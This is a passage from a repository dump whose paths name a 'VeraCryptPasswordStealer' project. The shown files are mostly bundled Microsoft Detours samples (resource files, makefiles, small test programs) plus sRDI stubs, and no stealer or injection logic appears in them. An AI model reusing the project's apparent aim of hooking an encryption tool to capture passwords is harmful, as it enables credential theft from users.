| Echo("Hello World"); 20 | Echo("Goodbye World"); 21 | 22 | return 0x99; 23 | } 24 | 25 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/excep/firstexc.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (firstexc.h of firstexc.exe) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #pragma once 11 | #ifndef _FIRSTEXC_H_ 12 | #define _FIRSTEXC_H_ 13 | 14 | /////////////////////////////////////////////// First Chance Exception Filter. 15 | // 16 | LPTOP_LEVEL_EXCEPTION_FILTER WINAPI 17 | DetourFirstChanceExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelFilter); 18 | 19 | #endif // _FIRSTEXC_H_ 20 | // 21 | //////////////////////////////////////////////////////////////// End of File. 22 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/findfunc/extend.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for extend.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "extend" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "extend" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Dyanmic Interception Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/findfunc/findfunc.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detour Test Program (findfunc.cpp of findfunc.exe) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include 11 | #include 12 | #include 13 | #include "target.h" 14 | 15 | int __cdecl main(void) 16 | { 17 | printf("findfunc.exe: Starting.\n"); 18 | fflush(stdout); 19 | 20 | printf("DLLs:\n"); 21 | for (HMODULE hModule = NULL; (hModule = DetourEnumerateModules(hModule)) != NULL;) { 22 | CHAR szName[MAX_PATH] = { 0 }; 23 | GetModuleFileNameA(hModule, szName, sizeof(szName) - 1); 24 | printf(" %p: %s\n", hModule, szName); 25 | } 26 | 27 | DWORD dwCount = 10000; 28 | for (int i = 0; i < 3; i++) { 29 | printf("findfunc.exe: Calling (%ld).\n", dwCount); 30 | dwCount = Target(dwCount) + 10000; 31 | } 32 | return 0; 33 | } 34 | // 35 | ///////////////////////////////////////////////////////////////// End of File. 36 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/findfunc/target.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detour Test Program (target.cpp of target.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include 11 | #include 12 | #include "target.h" 13 | 14 | extern "C" DWORD WINAPI Hidden(DWORD dwCount) 15 | { 16 | printf("target.dll: Hidden(%ld) -> %ld.\n", dwCount, dwCount + 1); 17 | return dwCount + 1; 18 | } 19 | 20 | // We use this point to ensure Hidden isn't inlined. 21 | static DWORD (WINAPI * SelfHidden)(DWORD dwCount) = Hidden; 22 | 23 | DWORD WINAPI Target(DWORD dwCount) 24 | { 25 | printf("target.dll: Target (%ld) -> %ld.\n", dwCount, dwCount + 100); 26 | dwCount = SelfHidden(dwCount + 100); 27 | printf("target.dll: Target (.....) -> %ld.\n", dwCount); 28 | return dwCount; 29 | } 30 | 31 | BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved) 32 | { 33 | (void)hinst; 34 | (void)dwReason; 35 | (void)reserved; 36 | 37 | return TRUE; 38 | } 39 | 40 | // 41 | ///////////////////////////////////////////////////////////////// End of File. 42 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/findfunc/target.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detour Test Program (target.h of target.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | DWORD WINAPI Target(DWORD dwCount); 11 | 12 | // 13 | ///////////////////////////////////////////////////////////////// End of File. 14 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/findfunc/target.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for target.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "target" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "target" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/member/Makefile: -------------------------------------------------------------------------------- 1 | ############################################################################## 2 | ## 3 | ## Makefile for Detours Test Programs. 4 | ## 5 | ## Microsoft Research Detours Package 6 | ## 7 | ## Copyright (c) Microsoft Corporation. All rights reserved. 8 | ## 9 | 10 | !include ..\common.mak 11 | 12 | LIBS=$(LIBS) kernel32.lib 13 | 14 | all: dirs \ 15 | $(BIND)\member.exe \ 16 | !IF $(DETOURS_SOURCE_BROWSING)==1 17 | $(OBJD)\member.bsc 18 | !ENDIF 19 | 20 | clean: 21 | -del *~ 2> nul 22 | -del $(BIND)\member.* 2> nul 23 | -rmdir /q /s $(OBJD) 2>nul 24 | 25 | realclean: clean 26 | -rmdir /q /s $(OBJDS) 2>nul 27 | 28 | dirs: 29 | @if not exist $(BIND) mkdir $(BIND) && echo. Created $(BIND) 30 | @if not exist $(OBJD) mkdir $(OBJD) && echo. Created $(OBJD) 31 | 32 | $(OBJD)\member.obj : member.cpp 33 | 34 | $(BIND)\member.exe : $(OBJD)\member.obj $(DEPS) 35 | cl $(CFLAGS) /Fe$@ /Fd$(@R).pdb $(OBJD)\member.obj \ 36 | /link $(LINKFLAGS) $(LIBS) /subsystem:console 37 | 38 | $(OBJD)\member.bsc : $(OBJD)\member.obj 39 | bscmake /v /n /o $@ $(OBJD)\member.sbr 40 | 41 | ############################################################################## 42 | 43 | test: $(BIND)\member.exe 44 | @echo. 45 | $(BIND)\member.exe 46 | @echo. 47 | 48 | ################################################################# End of File. 49 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/opengl/ogldet.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for ogldet.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "ogldet" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "ogldet" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Open GL Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/opengl/testogl.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // File: testogl.cpp 4 | // Module: testogl.exe (oglsimple.dll) 5 | // 6 | 7 | #include 8 | #include 9 | #include 10 | 11 | int __cdecl main() 12 | { 13 | printf("testogl.exe: Starting\n"); 14 | fflush(stdout); 15 | 16 | glFinish(); 17 | 18 | printf("testogl.exe: done\n"); 19 | fflush(stdout); 20 | 21 | return 0; 22 | } 23 | // 24 | ///////////////////////////////////////////////////////////////// End of File. 25 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/region/Makefile: -------------------------------------------------------------------------------- 1 | ############################################################################## 2 | ## 3 | ## Makefile for Detours Test Programs. 4 | ## 5 | ## Microsoft Research Detours Package 6 | ## 7 | ## Copyright (c) Microsoft Corporation. All rights reserved. 8 | ## 9 | 10 | !include ..\common.mak 11 | 12 | LIBS=$(LIBS) kernel32.lib 13 | 14 | all: dirs \ 15 | $(BIND)\region.exe \ 16 | !IF $(DETOURS_SOURCE_BROWSING)==1 17 | $(OBJD)\region.bsc 18 | !ENDIF 19 | 20 | clean: 21 | -del *~ 2> nul 22 | -del $(BIND)\region.* 2> nul 23 | -rmdir /q /s $(OBJD) 2>nul 24 | 25 | realclean: clean 26 | -rmdir /q /s $(OBJDS) 2>nul 27 | 28 | dirs: 29 | @if not exist $(BIND) mkdir $(BIND) && echo. Created $(BIND) 30 | @if not exist $(OBJD) mkdir $(OBJD) && echo. Created $(OBJD) 31 | 32 | $(OBJD)\region.obj : region.cpp 33 | 34 | $(BIND)\region.exe : $(OBJD)\region.obj $(DEPS) 35 | cl $(CFLAGS) /Fe$@ /Fd$(@R).pdb $(OBJD)\region.obj \ 36 | /link $(LINKFLAGS) $(LIBS) /subsystem:console 37 | 38 | $(OBJD)\region.bsc : $(OBJD)\region.obj 39 | bscmake /v /n /o $@ $(OBJD)\region.sbr 40 | 41 | ############################################################################## 42 | 43 | test: $(BIND)\region.exe 44 | @echo. 45 | $(BIND)\region.exe 46 | @echo. 47 | 48 | ################################################################# End of File. 49 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/simple/simple.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for simple.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "simple" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "simple" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/simple/sleep5.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (sleep5.cpp of sleep5.exe) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include 11 | #include 12 | #include 13 | 14 | int __cdecl main(int argc, char ** argv) 15 | { 16 | if (argc == 2) { 17 | Sleep(atoi(argv[1]) * 1000); 18 | } 19 | else { 20 | printf("sleep5.exe: Starting.\n"); 21 | 22 | Sleep(5000); 23 | 24 | printf("sleep5.exe: Done sleeping.\n"); 25 | } 26 | return 0; 27 | } 28 | // 29 | ///////////////////////////////////////////////////////////////// End of File. 30 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/slept/dslept.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for dslept.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "dslept" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "dslept" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Sleep Interception Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/slept/slept.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detour Test Program (slept.h of slept.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | DWORD WINAPI UntimedSleepEx(DWORD dwMilliseconds, BOOL bAlertable); 11 | DWORD WINAPI TimedSleepEx(DWORD dwMilliseconds, BOOL bAlertable); 12 | DWORD WINAPI GetSleptTicks(VOID); 13 | DWORD WINAPI TestTicks(VOID); 14 | DWORD WINAPI TestTicksEx(DWORD Add); 15 | 16 | // 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/slept/slept.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for sleep.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "sleep" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "sleep" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Sleep Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/talloc/tdll1x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll1x.cpp of talloc.exe/tdll1x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll1Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/talloc/tdll2x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll2x.cpp of talloc.exe/tdll2x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll2Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/talloc/tdll3x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll3x.cpp of talloc.exe/tdll3x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll3Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/talloc/tdll4x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll4x.cpp of talloc.exe/tdll4x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll4Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/talloc/tdll5x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll5x.cpp of talloc.exe/tdll5x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll5Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/talloc/tdll6x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll6x.cpp of talloc.exe/tdll6x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll6Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/talloc/tdll7x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll7x.cpp of talloc.exe/tdll7x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll7Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/talloc/tdll8x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll8x.cpp of talloc.exe/tdll8x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll8Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/talloc/tdll9x.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tdll9x.cpp of talloc.exe/tdll9x.dll) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | //////////////////////////////////////////////////////////////////// DLL Stuff 11 | // 12 | __declspec(dllexport) unsigned long __stdcall Dll9Function(unsigned long Value) 13 | { 14 | return Value + 1; 15 | } 16 | 17 | ///////////////////////////////////////////////////////////////// End of File. 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/traceapi/trcapi.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcapi.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcapi" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcapi" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Win32 API Tracing Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/tracebld/trcbld.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcbld.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcbld" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcbld" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Build Tracing Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/tracelnk/trclnk.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trclnk.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trclnk" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trclnk" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Dynamic Linking Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/tracemem/trcmem.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcmem.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcmem" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcmem" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Memory Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/tracereg/trcreg.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcreg.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcreg" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcreg" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Registry Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/traceser/trcser.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcser.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcser" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcsrc" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours Serial Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/tracessl/trcssl.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trcssl.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trcssl" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trcsll" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours SSL Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/tracetcp/trctcp.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for trctcp.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "trctcp" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "trctcp" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours TCP Trace Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/tryman/tryman.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Detours Test Program (tryman.cpp of tryman.exe) 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include 11 | 12 | extern int WINAPI Test3264(int arg); 13 | 14 | int __cdecl main(int argc, char ** argv) 15 | { 16 | (void)argv; 17 | int ret = 0; 18 | 19 | ret = Test3264(argc); 20 | return ret == 0 ? ret : 0; 21 | } 22 | // 23 | ///////////////////////////////////////////////////////////////// End of File. 24 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detours/samples/tryman/tstman.rc: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Version information for tstman.rc. 4 | // 5 | // Microsoft Research Detours Package 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #include "detver.h" 11 | 12 | #define VER_INTERNALNAME_STR "tstman" DETOURS_STRINGIFY(DETOURS_BITS) 13 | #define VER_ORIGINALFILENAME_STR "tstman" DETOURS_STRINGIFY(DETOURS_BITS) ".dll" 14 | #define VER_FILEDESCRIPTION_STR "Detours 32/64-bit Test Module" 15 | #define VER_COMPANYNAME_STR "Microsoft Corporation" 16 | 17 | #include "common.ver" 18 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/VCsniff/detver.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Common version parameters. 4 | // 5 | // Microsoft Research Detours Package, Version 4.0.1 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #define _USING_V110_SDK71_ 1 11 | #include "winver.h" 12 | #if 0 13 | #include 14 | #include 15 | #else 16 | #ifndef DETOURS_STRINGIFY 17 | #define DETOURS_STRINGIFY_(x) #x 18 | #define DETOURS_STRINGIFY(x) DETOURS_STRINGIFY_(x) 19 | #endif 20 | 21 | #define VER_FILEFLAGSMASK 0x3fL 22 | #define VER_FILEFLAGS 0x0L 23 | #define VER_FILEOS 0x00040004L 24 | #define VER_FILETYPE 0x00000002L 25 | #define VER_FILESUBTYPE 0x00000000L 26 | #endif 27 | #define VER_DETOURS_BITS DETOURS_STRINGIFY(DETOURS_BITS) 28 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/DotNet/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/FunctionTest/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // FunctionTest.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /coding/projects/VeraCryptPasswordStealer/sRDI/FunctionTest/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard 